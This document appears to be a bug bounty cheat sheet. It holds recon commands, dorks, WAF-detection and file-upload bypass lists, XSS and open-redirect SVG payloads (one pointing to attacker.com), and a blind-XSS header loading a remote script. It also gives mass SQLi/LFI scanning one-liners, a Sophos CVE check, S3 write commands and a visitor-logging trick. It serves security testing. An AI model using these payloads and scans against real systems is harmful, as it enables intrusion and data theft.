
Bug Bounty


Last updated 6 months ago

Custom Header Setup

Steps to Add Custom Header in Burp Requests

  • Select Proxy -> Options

  • Go to Match and Replace and select add

  • Specify the details of the match and replace as shown below

    1. Type: Request Header

    2. Match: Leave blank to add a new header

    3. Replace: hacker@bugbounty.site

    4. Comment: Manually BBP header

Information Gathering

  • LeakIX: often blocked by organizations for gray hat searches
  • Shodan: scans less frequently than LeakIX but whitelisted
  • Censys: best overall scanner but without vulnerability discovery
  • Chaos.ProjectDiscovery: real-time recon/DNS data for public Bug Bounty Programs
  • Search Engine Dorking
  • ReconFTW: automated recon and vulnerability scanner
  • Uncover: tool used to discover exposed hosts on the internet using multiple search engines
  • PrettyRecon: active reconnaissance tool
  • BountyStrike: collection of bash and python scripts that installs common tools for recon scans and asset discovery

  • Nuclei: security check scanner that is based on templates; get started with Nuclei using the commands below
  • Nuclei Templates Directory: visually navigate available nuclei templates
  • Community edition nuclei templates (CENT): collect and organize other custom templates

Getting started with some CVE scanning using Nuclei templates:

nuclei -target "https://site.com" -t cves
nuclei -target "https://site.com" -t /path/to/nuclei-templates/cves
# -rl takes an integer (requests per second); 50 is used here as an example value
nuclei -target "https://site.com" -t cves -rl 50

Mass security testing on subdomains:

cat subdomains.txt | nuclei -t /path/to/nuclei-templates/
nuclei -t /path/to/nuclei-templates/ -l urls.txt

-rl, -rate-limit int maximum number of requests to send per second (default 150)

-rlm, -rate-limit-minute int maximum number of requests to send per minute

Combining nuclei scanner with CENT custom templates

nuclei -u https://example.com -t ./cent-nuclei-templates -tags cve
nuclei -l urls.txt -t ./cent-nuclei-templates -tags cve
Google Dorks (purpose: dork)

  • Searching for directories: intitle:"index of /.git/"
  • Searching for extensions: allintext:index filetype:git
  • Searching for PHP pages: inurl:"index.php?id="
  • Searching for PHP admin dashboards: inurl:"admin/dashboard.php" site:.com
  • Searching for admin login pages: intitle:"login" "admin" site:http://site.com
  • Searching for an exposed Apache configuration file: intitle:"Index of /" .htaccess site:http://site.com
  • Searching for possible contact forms: site:website.com inurl:"contact" | inurl:"contact-us" | inurl:"contactus" | inurl:"contact_us" | inurl:"contact_form" | inurl:"contact-form"
  • SSRF-prone parameters: inurl:http | inurl:url= | inurl:path= | inurl:dest= | inurl:html= | inurl:data= | inurl:domain= | inurl:page= inurl:& site:example[.]com

Shodan Dorks (purpose: dork)

  • Searching for Jenkins instances in .gov: hostname:".gov" product:"Jenkins" 200
  • All SSL services presenting a certificate issued for *.google.com, with an HTTP 200 response: ssl.cert.subject.CN:"*.google.com" 200
  • All SSL certificates issued by the DoD, with an HTTP 200 response: ssl.cert.issuer.cn:"DOD SW CA-60" 200

Defense Evasion

Attempt to bypass application protections such as Cloudflare, Akamai, etc.

Check to see if application is behind a WAF

wafw00f $URL
whatwaf -u $URL
nmap -p $PORT --script=http-waf-fingerprint,http-waf-detect $URL

Authentication:

Registration

  • Input validation

  • Analysis

  • Misc

  • Password reset process

    • Password reset tokens (expiration/reuse)

  • Failed retry lockout (DoS)

  • Password policies

  • Update profile information without being asked for the password

  • Default or easy to guess keys

  • User enumeration

  • HTTP Authentication

  • Authentication Bypass

  • Identify weak authentication channels (find the primary mechanism and identify secondary mechanisms / methods [Mobile App, Call Center, SSO])

Authorization:

Session:

General:

File Upload:

  • Extensions Impact

    • ASP, ASPX, PHP5, PHP, PHP3: Webshell, RCE

    • SVG: Stored XSS, SSRF, XXE

    • GIF: Stored XSS, SSRF

    • CSV: CSV injection

    • XML: XXE

    • AVI: LFI, SSRF

    • HTML, JS : HTML injection, XSS, Open redirect

    • PNG, JPEG: Pixel flood attack (DoS)

    • ZIP: RCE via LFI, DoS

    • PDF, PPTX: SSRF, BLIND XXE

  • Blacklisting Bypass

    • PHP → .phtm, .phtml, .phps, .pht, .php2, .php3, .php4, .php5, .shtml, .phar, .pgif, .inc

    • ASP → .asp, .aspx, .cer, .asa

    • JSP → .jsp, .jspx, .jsw, .jsv, .jspf

    • Coldfusion → .cfm, .cfml, .cfc, .dbm

    • Using random capitalization → .pHp, .pHP5, .PhAr

  • Whitelisting Bypass

    • file.jpg.php

    • file.php.jpg

    • file.php.blah123jpg

    • file.php%00.jpg

    • file.php\x00.jpg (this can also be done while uploading the file: name it file.phpD.jpg and change the D (0x44) in a hex editor to 00)

    • file.php%00

    • file.php%20

    • file.php%0d%0a.jpg

    • file.php.....

    • file.php/

    • file.php.\

    • file.php#.png

    • file.

    • .html

Vulnerabilities

XSS

GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;

<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("HolyBugx XSS");
   </script>
</svg>

Open Redirect

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='https://attacker.com'"
xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>
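An added example, not part of the original page: a Python sanitiser that parses an uploaded SVG with the standard library, strips the `<script>` elements and `onload` handlers used by the XSS and open-redirect payloads above, and rejects the GIF89a polyglot because it is not well-formed XML; the `sanitize_svg` and `svg_upload_verdict` names are this example's own.

```python
import xml.etree.ElementTree as ET
from typing import List, Tuple

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
ET.register_namespace("", SVG_NS)          # serialise as <svg xmlns=...>, not ns0:svg
ET.register_namespace("xlink", XLINK_NS)

# Elements that have no place in a static image.
FORBIDDEN_TAGS = {"script", "foreignobject", "iframe", "embed", "object", "animate", "set"}
# href values with these schemes would execute code or pull in remote content.
BAD_SCHEMES = ("javascript:", "data:", "vbscript:")


def _local(qname: str) -> str:
    """'{http://www.w3.org/2000/svg}script' -> 'script'."""
    return qname.rsplit("}", 1)[-1].lower()


def sanitize_svg(data: bytes) -> Tuple[bytes, List[str]]:
    """Parse an uploaded SVG, strip active content, return (clean_xml, findings).

    ElementTree does not fetch external DTDs or entities, so the DOCTYPE in the
    payload above is skipped rather than resolved; malformed input raises
    ET.ParseError, which the caller treats as a rejection.
    """
    findings: List[str] = []
    root = ET.fromstring(data)
    if _local(root.tag) != "svg":
        raise ValueError("root element is not <svg>")
    parents = {child: parent for parent in root.iter() for child in parent}
    for el in list(root.iter()):            # snapshot: the tree is mutated below
        tag = _local(el.tag)
        if tag in FORBIDDEN_TAGS:
            parents[el].remove(el)
            findings.append(f"removed <{tag}>")
            continue
        for attr in list(el.attrib):
            name = _local(attr)
            value = el.attrib[attr].strip().lower()
            if name.startswith("on"):       # onload="alert(1)", onload="window.location=..."
                del el.attrib[attr]
                findings.append(f"removed {name} on <{tag}>")
            elif name == "href" and value.startswith(BAD_SCHEMES):
                del el.attrib[attr]
                findings.append(f"removed href with scheme {value.split(':', 1)[0]}:")
    return ET.tostring(root), findings


def svg_upload_verdict(data: bytes) -> str:
    """'rejected' (not a valid SVG document), 'clean' (nothing stripped) or 'sanitized'."""
    try:
        _, findings = sanitize_svg(data)
    except (ET.ParseError, ValueError):
        return "rejected"
    return "sanitized" if findings else "clean"
```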

Adobe Experience Manager (AEM) Configuration Testing

Shodan Dork:

http.component:"Adobe Experience Manager"

Reporting

Recon

HackerOne Programs

curl -sL https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/main/data/hackerone_data.json | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type] | @tsv'

BugCrowd Programs

curl -sL https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/main/data/bugcrowd_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'

Intigriti Programs

curl -sL https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/main/data/intigriti_data.json | jq -r '.[].targets.in_scope[] | [.endpoint, .type] | @tsv'

YesWeHack Programs

curl -sL https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/main/data/yeswehack_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'

HackenProof Programs

curl -sL https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/main/data/hackenproof_data.json | jq -r '.[].targets.in_scope[] | [.target, .type, .instruction] | @tsv'

Federacy Programs

curl -sL https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/main/data/federacy_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'

Dump the list of all in-scope BBP domains and pull out the entries that are bare IP addresses rather than DNS names (ips.txt)

curl -sL https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/main/data/domains.txt > domains.txt && grep -E -o '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)' domains.txt > ips.txt

Martian Grip

shodan download testing 'cloud.region:"us-east-1" 200 product:"Elastic" port:8001'; shodan parse --fields ip_str,port testing.json.gz | tee testing_parsed.out | awk '{print$1":"$2}' | httpx -silent -o testing_httpx.out | nuclei -as -silent -o testing_nuclei.out; cat testing_nuclei.out | awk -F " " '{print $6}' | grip | uniq -u | tee testing_vuln_ips.out | nrich - | tee testing_nrich.out
  • The shodan download command is attempting to search for devices in the US East (N. Virginia) region that have a product named "Elastic" and are listening on port 8001. The parse command is used to extract certain fields (in this case, ip_str and port) from the results of the search, which are stored in the file testing.json.gz.

  • httpx is a tool that can be used to perform HTTP requests and analyze the response. In this case, the command is using the -silent flag to suppress output and the -o flag to write the response to a file called testing_httpx.out. The input for this command appears to be the list of IP addresses and ports extracted from the Shodan search results.

  • awk is a tool for processing text files. The command appears to be extracting the sixth field ($6) from the output of the nuclei command, which is piped (|) to the grip command.

  • grip is a command line tool for rendering local readme files before sending them to GitHub. In this case, it is used to render the output of the awk command, which is then passed to uniq with the -u flag; -u keeps only the lines that occur once (plain uniq would instead collapse repeated lines to a single copy). The resulting list is written to the file testing_vuln_ips.out.

Find SQLi at scale

# collect target urls
subfinder -d site.com -silent -all | httpx -silent -threads 100 | katana -d 4 -jc -ef css,png,svg,ico,woff,gif | tee -a urls
# filter potential SQLi urls
cat urls | gf sqli | tee -a sqli
# run test
while read line; do sqlmap -u "$line" --parse-errors --current-db --invalid-logical --invalid-bignum --invalid-string --risk 3; done < sqli

Local File Inclusion

gau HOST | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'

Open-redirect

export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
cat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk > /dev/null

XSS

gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee OUT.txt

Blind XSS Mass Hunting

cat domains.txt | waybackurls | httpx -H "User-Agent: \"><script src=https://chirag.bxss.in></script>"

Unauthenticated Blind SSRF via xmlrpc.php

cat iplist| httpx -silent -path /xmlrpc.php -title -match-string "XML-RPC"

Find JavaScript Files

assetfinder --subs-only HOST | gau | egrep -v '(\.css|\.png|\.jpeg|\.jpg|\.svg|\.gif|\.woff)' | while read url; do vars=$(curl -s "$url" | grep -Eo "var [a-zA-Z0-9_]+" | sed -e "s,var,$url?,g" -e 's/ //g' | grep -v '\.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n" "\e[1;32m$vars"; done

Extract Endpoints from JavaScript

cat FILE.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | sort -u

Get CIDR & Org Information from Target Lists

for HOST in $(cat HOSTS.txt); do echo $(for ip in $(dig a $HOST +short); do whois $ip | grep -e "CIDR\|Organization" | tr -s " " | paste - -; done | uniq); done

Finding Subdomains

Get Subdomains from RapidDNS.io

curl -s "https://rapiddns.io/subdomain/$1?full=1#result" | grep "<td><a" | cut -d '"' -f 2 | grep http | cut -d '/' -f3 | sed 's/#results//g' | sort -u

Get Subdomains from BufferOver.run

curl -s "https://dns.bufferover.run/dns?q=.HOST.com" | jq -r '.FDNS_A[]' | cut -d',' -f2 | sort -u
export domain="HOST"; curl -s "https://tls.bufferover.run/dns?q=$domain" | jq -r '.Results[]' | rev | cut -d ',' -f1 | rev | sort -u | grep "\.$domain"

Get Subdomains from Riddler.io

curl -s "https://riddler.io/search/exportcsv?q=pld:HOST" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u 

Get Subdomains from VirusTotal

curl -s "https://www.virustotal.com/ui/domains/HOST/subdomains?limit=40" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

Get Subdomain with cyberxplore

curl https://subbuster.cyberxplore.com/api/find?domain=HOST -s | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" 

Get Subdomains from CertSpotter

curl -s "https://certspotter.com/api/v1/issuances?domain=HOST&include_subdomains=true&expand=dns_names" | jq .[].dns_names | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u 

Get Subdomains from Archive

curl -s "http://web.archive.org/cdx/search/cdx?url=*.HOST/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sort -u

Get Subdomains from JLDC

curl -s "https://jldc.me/anubis/subdomains/HOST" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

Get Subdomains from securitytrails

curl -s "https://securitytrails.com/list/apex_domain/HOST" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep ".HOST" | sort -u

Bruteforcing Subdomain using DNS Over

while read sub; do echo "https://dns.google.com/resolve?name=$sub.HOST&type=A&cd=true" | parallel -j100 -q curl -s -L --silent  | grep -Po '[{\[]{1}([,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]|".*?")+[}\]]{1}' | jq | grep "name" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep ".HOST" | sort -u ; done < FILE.txt

Get Subdomains With sonar.omnisint.io

curl --silent https://sonar.omnisint.io/subdomains/HOST | grep -oE "[a-zA-Z0-9._-]+\.HOST" | sort -u 

Get Subdomains With synapsint.com

curl --silent -X POST https://synapsint.com/report.php -d "name=https%3A%2F%2FHOST" | grep -oE "[a-zA-Z0-9._-]+\.HOST" | sort -u 

Get Subdomains from crt.sh

curl -s "https://crt.sh/?q=%25.HOST&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u

Sort & Tested Domains from Recon.dev

curl "https://recon.dev/api/search?key=apikey&domain=HOST" |jq -r '.[].rawDomains[]' | sed 's/ //g' | sort -u | httpx -silent

Discover subdomains and enumerate API endpoints discovered with subfinder

subfinder -d host.com -silent -all | httpx -silent -o host_httpx.txt; for i in $(cat host_httpx.txt); do DOMAIN=$(echo $i | unfurl format %d); ffuf -u $i/FUZZ -w common-api-endpoints.txt -o ${DOMAIN}_ffuf.txt; done

Subdomain Bruteforcer with FFUF

ffuf -u https://FUZZ.HOST -w FILE.txt -v | grep "| URL |" | awk '{print $4}'

Find Allocated IP Ranges for ASN from IP Address

whois -h whois.radb.net -i origin -T route $(whois -h whois.radb.net IP | grep origin: | awk '{print $NF}' | head -1) | grep -w "route:" | awk '{print $NF}' | sort -n

Extract IPs from a File

grep -E -o '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)' file.txt

CVE-2022-1040 (list your domains without http/https in the "sophos_servers" file)

cat sophos_servers | while read host; do curl --connect-timeout 10 -ks -H "X-Requested-With: XMLHttpRequest" -X POST "https://$host/userportal/Controller?mode=8700&operation=1&datagrid=179&json=\{"👽":"TEST"\}" | grep -q 'Session Expired' && printf "$host \033[1;41mVulnerable [ Sophos RCE ]\e[0m\n"; done

General

Use grep to extract URLs from junk data

  • From a local file

cat file | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"

  • From an online resource

curl http://site.xxx/file.js | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"

Techniques/Checklist

JS File Analysis

2FA Code Leakage in Response

Lack of Brute-Force Protection

2FA Referer Check Bypass

Missing 2FA Code Integrity Validation

Enabling 2FA Doesn’t Expire Previous Session

Clickjacking on 2FA Disable Feature

Response Manipulation

Status Code Manipulation

2FA Code Reusability

CSRF on 2FA Disable Feature

CloudFront

Bypassing Cloudfront XSS WAF

  1. alert = window["al"+"ert"]

  2. bypass () with ``

  3. replace space with /

  4. encode symbols:

Remote Code Execution Parameters

?cmd={payload} ?exec={payload} ?command={payload} ?execute={payload} ?ping={payload}
?query={payload} ?jump={payload} ?code={payload} ?reg={payload} ?do={payload}
?func={payload} ?arg={payload} ?option={payload} ?load={payload} ?process={payload}
?step={payload} ?read={payload} ?function={payload} ?req={payload} ?feature={payload}
?exe={payload} ?module={payload} ?payload={payload} ?run={payload} ?print={payload}

Git

/.git

/.gitkeep

/.git-rewrite

/.gitreview

/.git/HEAD

/.gitconfig

/.git/index

/.git/logs

/.svnignore

/.gitattributes

/.gitmodules

/.svn/entries

Daily updated text file of all domains within scope on active Bug Bounty Programs: https://github.com/arkadiyt/bounty-targets-data/blob/main/data/domains.txt

Sensitive Information Exposure methods: use gitdumper.sh (from GitTools) or gittyleaks.

Cloudflare Origin IP: worth a shot to use the tool by @gwen001.

JWT tooling: c-jwt-cracker, jwt_tool, JWT2John. Convert a JWT to a format crackable by John with python3 jwt2john.py

S3 buckets: lazys3 / AWS CLI, for example

aws s3 cp test.txt s3://target --no-sign-request
aws s3 ls s3://target --no-sign-request

Bucket URL formats: http://bucket.s3.amazonaws.com and http://s3.amazonaws.com/bucket. Background reading: Metadata Cloud, How the AWS Access Key & Secret works.

Abusing "Upload from URL": if the fetched image is going to be saved on some public site, you could also point the fetch at an IPlogger URL and collect information on every visitor.

Resources

  • Swagger UI XSS

  • AEM Hacker Tool

  • SlideShare presentation on AEM by 0ang3el

  • CVSS 3.1 Calculator

  • Dump in-scope assets from BBPs using the bounty-targets-data repo from @arkadiyt

  • From @notnci, with beginner explanation. The nuclei and nrich stages of the Martian Grip one-liner above, continuing the breakdown given there:

    • nuclei is a tool for detecting vulnerabilities and misconfigurations in web applications. The -as flag (automatic scan) makes the tool detect the target's technologies and run the matching templates against it in order to identify potential vulnerabilities. The -silent flag suppresses output, and the -o flag specifies an output file for the results. The input for this command is the list of IP addresses and ports extracted from the Shodan search results.

    • nrich is a tool for performing OSINT (Open Source Intelligence) on IP addresses. The input for this command is the list of unique IP addresses produced by the previous stage, and the - argument tells the tool to read that input from standard input (stdin). The results are written to the file testing_nrich.out.